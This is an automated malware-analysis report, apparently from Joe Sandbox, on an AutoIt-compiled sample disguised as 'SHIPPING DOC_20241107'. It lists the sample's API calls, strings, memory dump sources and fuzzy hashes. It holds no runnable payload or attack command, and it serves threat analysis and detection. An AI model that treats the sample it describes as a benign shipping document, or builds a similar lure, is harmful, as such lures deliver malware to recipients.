                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3521893082-0
                                                                                                                              • Opcode ID: 9c7e7c652a378aa7abc6000c37b5b2ed51b484d70d92509b77d3d497cfe898cb
                                                                                                                              • Instruction ID: 4c0aea4d7392fcab7b0546742b9b4578128951befffa9d6b6b758ccda235bb59
                                                                                                                              • Opcode Fuzzy Hash: 9c7e7c652a378aa7abc6000c37b5b2ed51b484d70d92509b77d3d497cfe898cb
                                                                                                                              • Instruction Fuzzy Hash: 68918B72818311BFC710DFA4EC48E5B7BB9FB89321F100B29F9A2961A0D771D846CB52
                                                                                                                              APIs
                                                                                                                              • DestroyWindow.USER32 ref: 009B2CA2
                                                                                                                              • DeleteObject.GDI32(00000000), ref: 009B2CE8
                                                                                                                              • DeleteObject.GDI32(00000000), ref: 009B2CF3
                                                                                                                              • DestroyIcon.USER32(00000000,?,?,?), ref: 009B2CFE
                                                                                                                              • DestroyWindow.USER32 ref: 009B2D09
                                                                                                                              • SendMessageW.USER32(?,00001308,?,00000000), ref: 009EC5BB
                                                                                                                              • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 009EC5F4
                                                                                                                              • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 009ECA1D
                                                                                                                                • Part of subcall function 009B1B41: InvalidateRect.USER32(?,00000000,00000001), ref: 009B1B9A
                                                                                                                              • SendMessageW.USER32(?,00001053), ref: 009ECA5A
                                                                                                                              • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 009ECA71
                                                                                                                              • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 009ECA87
                                                                                                                              • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 009ECA92
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                                                                              • String ID: 0
                                                                                                                              • API String ID: 464785882-4108050209
                                                                                                                              • Opcode ID: 7af7c5b3b18de3aacfb1e2911c1b85ef3cc00d7a37796ba0a3920aa785c776bb
                                                                                                                              • Instruction ID: e02eee77609dba61e44f3757fe2c029d2ea5db874a2a061c538cbf41a24fb293
                                                                                                                              • Opcode Fuzzy Hash: 7af7c5b3b18de3aacfb1e2911c1b85ef3cc00d7a37796ba0a3920aa785c776bb
                                                                                                                              • Instruction Fuzzy Hash: 56129C70600241EFDB26CF25CA84BA9BBA9FF49311F5445A9F8D5DB262C731EC42CB91
                                                                                                                              APIs
                                                                                                                              • DestroyWindow.USER32 ref: 00A275F3
                                                                                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00A276B2
                                                                                                                              • SetRect.USER32 ref: 00A276F0
                                                                                                                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00A27702
                                                                                                                              • CreateWindowExW.USER32 ref: 00A27748
                                                                                                                              • GetClientRect.USER32(00000000,?,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00A27754
                                                                                                                              • CreateWindowExW.USER32 ref: 00A27798
                                                                                                                              • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00A277A7
                                                                                                                              • GetStockObject.GDI32(00000011), ref: 00A277B7
                                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00A277BB
                                                                                                                              • GetTextFaceW.GDI32(00000000,00000040,?), ref: 00A277CB
                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?), ref: 00A277D4
                                                                                                                              • DeleteDC.GDI32(00000000), ref: 00A277DD
                                                                                                                              • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00A27809
                                                                                                                              • SendMessageW.USER32(00000030,00000000,00000001), ref: 00A27820
                                                                                                                              • CreateWindowExW.USER32 ref: 00A2785B
                                                                                                                              • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00A2786F
                                                                                                                              • SendMessageW.USER32(00000404,00000001,00000000), ref: 00A27880
                                                                                                                              • CreateWindowExW.USER32 ref: 00A278B0
                                                                                                                              • GetStockObject.GDI32(00000011), ref: 00A278BB
                                                                                                                              • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00A278C6
                                                                                                                              • ShowWindow.USER32(00000004), ref: 00A278D0
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                              • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                              • API String ID: 2910397461-517079104
                                                                                                                              • Opcode ID: 925835cae7d2314803ef66238eba99fc7404ca56f1af5319a955383d2bd0c795
                                                                                                                              • Instruction ID: c31e03b37571f039c33bbf8817c34b67e4e7333beff59d0cf1799c8e0f648f08
                                                                                                                              • Opcode Fuzzy Hash: 925835cae7d2314803ef66238eba99fc7404ca56f1af5319a955383d2bd0c795
                                                                                                                              • Instruction Fuzzy Hash: 68A173B1A50615BFEB14DBA8DD4AFEE7BB9EB44710F008114FA15A72E1C7B0AD41CB60
                                                                                                                              APIs
                                                                                                                              • SetErrorMode.KERNEL32(00000001), ref: 00A1ADAA
                                                                                                                              • GetDriveTypeW.KERNEL32(?,00A3FAC0,?,\\.\,00A3F910), ref: 00A1AE87
                                                                                                                              • SetErrorMode.KERNEL32(00000000,00A3FAC0,?,\\.\,00A3F910), ref: 00A1AFE5
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorMode$DriveType
                                                                                                                              • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                              • API String ID: 2907320926-4222207086
                                                                                                                              • Opcode ID: 9ef15ff281e111800884f58148af53557f0be59fb136b2b38b218bf06f5f597b
                                                                                                                              • Instruction ID: 6a584350e7605dacc072aae83797dfbf70e0f375a2c1b86cb4e79657a47f80be
                                                                                                                              • Opcode Fuzzy Hash: 9ef15ff281e111800884f58148af53557f0be59fb136b2b38b218bf06f5f597b
                                                                                                                              • Instruction Fuzzy Hash: 6951C5B5649205ABCB10EB50CB829FDB374BB647507204A16F906E7291CB34DD82DB83
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: __wcsnicmp
                                                                                                                              • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                                                              • API String ID: 1038674560-86951937
                                                                                                                              • Opcode ID: 714a8d6bd8c01571b18bceb8f994ff84be68721e9713cfebdeb5732e6ff817e6
                                                                                                                              • Instruction ID: 0373bafbe93d2b77f99364633d7cecd6d9e4b6f167cad637ccb308648afb1c2e
                                                                                                                              • Opcode Fuzzy Hash: 714a8d6bd8c01571b18bceb8f994ff84be68721e9713cfebdeb5732e6ff817e6
                                                                                                                              • Instruction Fuzzy Hash: 35814B70644215BBCB21AF61CD92FEE776CBF90720F048425F945AB192EBA4EE01C2A5
                                                                                                                              APIs
                                                                                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103), ref: 00A39B04
                                                                                                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00A39BBD
                                                                                                                              • SendMessageW.USER32(?,00001102,00000002,?), ref: 00A39BD9
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend$Window
                                                                                                                              • String ID: 0
                                                                                                                              • API String ID: 2326795674-4108050209
                                                                                                                              • Opcode ID: 3329515d1431518d2b6097365441cffe5bb13967e76fd50e75b0fb6d649c4090
                                                                                                                              • Instruction ID: 6c106544a5bf73ad8a32702b28e3c6dcf37410e93fe5d1493614f789517c5edf
                                                                                                                              • Opcode Fuzzy Hash: 3329515d1431518d2b6097365441cffe5bb13967e76fd50e75b0fb6d649c4090
                                                                                                                              • Instruction Fuzzy Hash: C502DC30508301AFEB25CF24CC49BABBBE5FF49350F04862DF999962A1C7B5D945CB92
                                                                                                                              APIs
                                                                                                                              • GetSysColor.USER32(00000012,00000000,?,?,?,?,?,?,?,?,?,00A3A62C,?,?,00000000,?), ref: 00A3A935
                                                                                                                              • SetTextColor.GDI32(?,?), ref: 00A3A939
                                                                                                                              • GetSysColorBrush.USER32 ref: 00A3A94F
                                                                                                                              • GetSysColor.USER32(0000000F,?,?,?,?,?,?,?,00A3A62C,?,?,00000000,?,?), ref: 00A3A95A
                                                                                                                              • CreateSolidBrush.GDI32(?), ref: 00A3A95F
                                                                                                                              • GetSysColor.USER32(00000011,?,?,?,?,?,?,?,00A3A62C,?,?,00000000,?,?), ref: 00A3A977
                                                                                                                              • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00A3A985
                                                                                                                              • SelectObject.GDI32(?,00000000), ref: 00A3A996
                                                                                                                              • SetBkColor.GDI32(?,00000000), ref: 00A3A99F
                                                                                                                              • SelectObject.GDI32(?,?), ref: 00A3A9AC
                                                                                                                              • InflateRect.USER32 ref: 00A3A9CB
                                                                                                                              • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00A3A9E2
                                                                                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 00A3A9F7
                                                                                                                              • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00A3AA1F
                                                                                                                              • GetWindowTextW.USER32(00000000,00000000,00000001,?,?,?,?,?,?,?,00A3A62C,?,?,00000000,?,?), ref: 00A3AA46
                                                                                                                              • InflateRect.USER32 ref: 00A3AA64
                                                                                                                              • DrawFocusRect.USER32 ref: 00A3AA6F
                                                                                                                              • GetSysColor.USER32(00000011,?,?,?,?,?,?,?,00A3A62C), ref: 00A3AA7D
                                                                                                                              • SetTextColor.GDI32(?,00000000), ref: 00A3AA85
                                                                                                                              • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00A3AA99
                                                                                                                              • SelectObject.GDI32(?,00A3A62C), ref: 00A3AAB0
                                                                                                                              • DeleteObject.GDI32(?), ref: 00A3AABB
                                                                                                                              • SelectObject.GDI32(?,?), ref: 00A3AAC1
                                                                                                                              • DeleteObject.GDI32(?), ref: 00A3AAC6
                                                                                                                              • SetTextColor.GDI32(?,?), ref: 00A3AACC
                                                                                                                              • SetBkColor.GDI32(?,?), ref: 00A3AAD6
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1996641542-0
                                                                                                                              • Opcode ID: 4b543986a2078dfb0d777321155d3fd754a9271d9620cc9aec3e33f74e8179ae
                                                                                                                              • Instruction ID: 520085e4c3c4868d90d36ca09aa56c07b7659e57fe3e6fd59eed68a79ac2eaf8
                                                                                                                              • Opcode Fuzzy Hash: 4b543986a2078dfb0d777321155d3fd754a9271d9620cc9aec3e33f74e8179ae
                                                                                                                              • Instruction Fuzzy Hash: E0514C71D10218FFDB10DFA4EC49EAEBBB9EB48320F114225F911AB2A1D7719941CF90
                                                                                                                              APIs
                                                                                                                              • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00A38AF3
                                                                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00A38B04
                                                                                                                              • CharNextW.USER32(0000014E), ref: 00A38B33
                                                                                                                              • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00A38B74
                                                                                                                              • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00A38B8A
                                                                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00A38B9B
                                                                                                                              • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00A38BB8
                                                                                                                              • SetWindowTextW.USER32(?,0000014E,?,?,?,?,?), ref: 00A38C0A
                                                                                                                              • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00A38C20
                                                                                                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00A38C51
                                                                                                                              • _memset.LIBCMT ref: 00A38C76
                                                                                                                              • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00A38CBF
                                                                                                                              • _memset.LIBCMT ref: 00A38D1E
                                                                                                                              • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00A38D48
                                                                                                                              • SendMessageW.USER32(?,00001074,?,00000001), ref: 00A38DA0
                                                                                                                              • SendMessageW.USER32(?,0000133D,?,?), ref: 00A38E4D
                                                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00A38E6F
                                                                                                                              • GetMenuItemInfoW.USER32 ref: 00A38EB9
                                                                                                                              • SetMenuItemInfoW.USER32 ref: 00A38EE6
                                                                                                                              • DrawMenuBar.USER32(?), ref: 00A38EF5
                                                                                                                              • SetWindowTextW.USER32(?,0000014E,?,?,?,?,?), ref: 00A38F1D
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                                                                              • String ID: 0
                                                                                                                              • API String ID: 1073566785-4108050209
                                                                                                                              • Opcode ID: 3ba5bee821163f83fbc0cb5c50166818620b12607f552b61863107463a3ffa9a
                                                                                                                              • Instruction ID: 2e0c2a380e6e3c0b199237fc361eea28554697d56156ab4547e69b8e2c567162
                                                                                                                              • Opcode Fuzzy Hash: 3ba5bee821163f83fbc0cb5c50166818620b12607f552b61863107463a3ffa9a
                                                                                                                              • Instruction Fuzzy Hash: 89E16D71901308AFDF20DFA5CC85EEE7BB9EF45750F10815AF915AA290DB788A81DF60
                                                                                                                              APIs
                                                                                                                              • GetCursorPos.USER32(?), ref: 00A34A33
                                                                                                                              • GetDesktopWindow.USER32 ref: 00A34A48
                                                                                                                              • GetWindowRect.USER32(00000000), ref: 00A34A4F
                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00A34AB1
                                                                                                                              • DestroyWindow.USER32 ref: 00A34ADD
                                                                                                                              • CreateWindowExW.USER32 ref: 00A34B06
                                                                                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00A34B24
                                                                                                                              • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00A34B4A
                                                                                                                              • SendMessageW.USER32(?,00000421,?,?), ref: 00A34B5F
                                                                                                                              • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00A34B72
                                                                                                                              • IsWindowVisible.USER32(?), ref: 00A34B92
                                                                                                                              • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00A34BAD
                                                                                                                              • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00A34BC1
                                                                                                                              • GetWindowRect.USER32(?,?), ref: 00A34BD9
                                                                                                                              • MonitorFromPoint.USER32(?,?,00000002), ref: 00A34BFF
                                                                                                                              • GetMonitorInfoW.USER32(00000000,?), ref: 00A34C19
                                                                                                                              • CopyRect.USER32(?,?), ref: 00A34C30
                                                                                                                              • SendMessageW.USER32(?,00000412,00000000), ref: 00A34C9B
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                              • String ID: ($0$tooltips_class32
                                                                                                                              • API String ID: 698492251-4156429822
                                                                                                                              • Opcode ID: 56c2ee6ee8a9bde882f251eef9b99ac2e79756ab0ef9fca6ba693b28960a805a
                                                                                                                              • Instruction ID: 1f9e7a9e6aaabb419dfda981d13262e4106a6c2b702b3151ad6ffd87e3e236e1
                                                                                                                              • Opcode Fuzzy Hash: 56c2ee6ee8a9bde882f251eef9b99ac2e79756ab0ef9fca6ba693b28960a805a
                                                                                                                              • Instruction Fuzzy Hash: 0EB1AA70614341AFDB44DF64C989B6ABBE4FF88310F00891CF5999B2A1DB71EC05CB96
                                                                                                                              APIs
                                                                                                                              • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00A144ED
                                                                                                                              • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00A14513
                                                                                                                              • _wcscpy.LIBCMT ref: 00A14541
                                                                                                                              • _wcscmp.LIBCMT ref: 00A1454C
                                                                                                                              • _wcscat.LIBCMT ref: 00A14562
                                                                                                                              • _wcsstr.LIBCMT ref: 00A1456D
                                                                                                                              • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00A14589
                                                                                                                              • _wcscat.LIBCMT ref: 00A145D2
                                                                                                                              • _wcscat.LIBCMT ref: 00A145D9
                                                                                                                              • _wcsncpy.LIBCMT ref: 00A14604
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                                                                              • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                              • API String ID: 699586101-1459072770
                                                                                                                              • Opcode ID: 01b063054fdceede646909eb0a590b66ddf18b5b33fc18974219f5fc99691962
                                                                                                                              • Instruction ID: b0b00b11eae05518c36a0072ce9bcf1401c1585cad034ff3bb81a82bc743340d
                                                                                                                              • Opcode Fuzzy Hash: 01b063054fdceede646909eb0a590b66ddf18b5b33fc18974219f5fc99691962
                                                                                                                              • Instruction Fuzzy Hash: F7410776A402007FDB10AB68DC43FFF777DEF85720F14846AF804E6292EB759A0196A5
                                                                                                                              APIs
                                                                                                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 009B28BC
                                                                                                                              • GetSystemMetrics.USER32(00000007), ref: 009B28C4
                                                                                                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 009B28EF
                                                                                                                              • GetSystemMetrics.USER32(00000008), ref: 009B28F7
                                                                                                                              • GetSystemMetrics.USER32(00000004), ref: 009B291C
                                                                                                                              • SetRect.USER32 ref: 009B2939
                                                                                                                              • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 009B2949
                                                                                                                              • CreateWindowExW.USER32 ref: 009B297C
                                                                                                                              • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 009B2990
                                                                                                                              • GetClientRect.USER32(00000000,000000FF), ref: 009B29AE
                                                                                                                              • GetStockObject.GDI32(00000011), ref: 009B29CA
                                                                                                                              • SendMessageW.USER32(00000000,00000030,00000000), ref: 009B29D5
                                                                                                                                • Part of subcall function 009B2344: GetCursorPos.USER32(?), ref: 009B2357
                                                                                                                                • Part of subcall function 009B2344: ScreenToClient.USER32(00A757B0,?), ref: 009B2374
                                                                                                                                • Part of subcall function 009B2344: GetAsyncKeyState.USER32 ref: 009B2399
                                                                                                                                • Part of subcall function 009B2344: GetAsyncKeyState.USER32 ref: 009B23A7
                                                                                                                              • SetTimer.USER32(00000000,00000000,00000028,009B1256), ref: 009B29FC
                                                                                                                              Strings
                                                                                                                              • aaafb3ddcdd68635e8c689174e1e7ffc02ea14c54fb4a848c83119c8d9105769f556a0427ec5bf9d609f7afb1e1b4c10e28c7c0f396f7cb422965561e84f190f09, xrefs: 009EC309
                                                                                                                              • AutoIt v3 GUI, xrefs: 009B2974
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                              • String ID: AutoIt v3 GUI$aaafb3ddcdd68635e8c689174e1e7ffc02ea14c54fb4a848c83119c8d9105769f556a0427ec5bf9d609f7afb1e1b4c10e28c7c0f396f7cb422965561e84f190f09
                                                                                                                              • API String ID: 1458621304-48525662
                                                                                                                              • Opcode ID: 577e851e4a4a9e5e231f1e0ab462f645c80661517241fdd432dbc29d19c9edf6
                                                                                                                              • Instruction ID: e39a3082e9bf0324806b50f1fed4f7a377cd14fc108e92df136bc9271cd87ce7
